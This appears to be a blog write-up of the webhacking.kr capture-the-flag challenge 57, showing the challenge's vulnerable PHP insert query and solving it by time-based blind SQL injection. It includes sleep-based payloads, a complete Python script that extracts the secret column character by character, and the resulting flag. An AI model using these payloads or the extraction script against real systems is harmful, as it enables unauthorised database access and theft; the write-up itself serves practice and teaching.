WEBHACKING.KR c57: Blind sql injection

Point: 600
URL: https://webhacking.kr/challenge/web-34/index.php

Source Code

<?php
  include "../../config.php";
  include "./flag.php";
  if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 57</title>
</head>
<body>
<?php
  $db = dbconnect();
  if($_GET['msg'] && isset($_GET['se'])){
    $_GET['msg'] = addslashes($_GET['msg']);
    $_GET['se'] = addslashes($_GET['se']);
    if(preg_match("/select|and|or|not|&|\||benchmark/i",$_GET['se'])) exit("Access Denied");
    mysqli_query($db,"insert into chall57(id,msg,pw,op) values('{$_SESSION['id']}','{$_GET['msg']}','{$flag}',{$_GET['se']})");
    echo "Done<br><br>";
    if(rand(0,100) == 1) mysqli_query($db,"delete from chall57");
  }
?>
<form method=get action=index.php>
<table border=0>
<tr><td>message</td><td><input name=msg size=50 maxlength=50></td></tr>
<tr><td>secret</td><td><input type=radio name=se value=1 checked>yes<br><br><input type=radio name=se value=0>no</td></tr>
<tr><td colspan=2 align=center><input type=submit></td></tr>
</table>
</form>
<br><br><a href=./?view_source=1>view-source</a>
</body>
</html>

It’s soo easy to realize that it’s a blind sqli. If you don’t know blind sqli, you can read in here.
Firstly, I must find a query which can help me read flag and I found it.
I knew fomat of flag is “FLAG{….}”. Flag is pw. I check with query IF((ASCII(MID(pw,1,1)))=70,sleep(5),1))

Request time total is 5.099s

And, Booom!!!!
Secondtly, I have a script python which can show all character of flag

import requests
from sys import stdout
delay1 = 2;
delay2 = 1;
def check(data):
    url = "https://webhacking.kr/challenge/web-34/index.php?msg=1&se="
    req = requests.get(url+ data)
    time = req.elapsed.total_seconds();
    if "Access Denied" in req.text:
        print req.text
        return False
    if (time > delay1):
        return 1
    if (time > delay2):
        return 0;
    return -1;
def get_length_flag():

    query = "IF(CHAR_LENGTH(pw)<={0},sleep({1}),sleep({2}))"
    l = 0
    r=  50
    while(r-l>1):
        g = (l+r)//2
        p = query.format(g , delay1, delay2)
        stdout.write("\r[%d]" % g)
        stdout.flush()
        while(1):
            res = check(p)
            if res != -1:
                break
            check("1")
        if res == 1:
            r = g
        else:
            l = g
    return r

def get_flag():
    LEN_VETSION =   get_length_flag()
    stdout.write("\r\033[K") #clear  line down
    stdout.flush()
    stdout.write("Length: %d\n"% LEN_VETSION)
    stdout.flush()
    print "None"
    query = "IF((ASCII(MID(pw, {0}, {0}))) <= {1},sleep({2}),sleep({3}))"
    ans = ""
    for i in range(LEN_VETSION):
        l = 0
        r=  129
        while(r-l>1):
            g = (l+r)//2
            p = query.format(i+1, g , delay1, delay2)

            stdout.write("\r[%d]: [%d]" % (i, g))
            stdout.flush()
            while(1):
                res = check(p)
                if res != -1:
                    break
                check("1")
            if res == 1:
                r = g
            else:
                l = g
        ans += chr(r)
        stdout.write("\033[K") #clear  line down
        stdout.write("\033[F") # up one line
        stdout.write("\033[K") # clear line
        stdout.write("\r%s\n" % ans)
        stdout.flush()
    return ans
print get_flag()
#print check("IF((ASCII(MID(@@version, 1, 1)))=53,sleep(1.1),1)")

Flag: FLAG{y2u.be/kmPgjr0EL64}

I earned 600 points!!!

Trả lời

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Google photo

Bạn đang bình luận bằng tài khoản Google Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.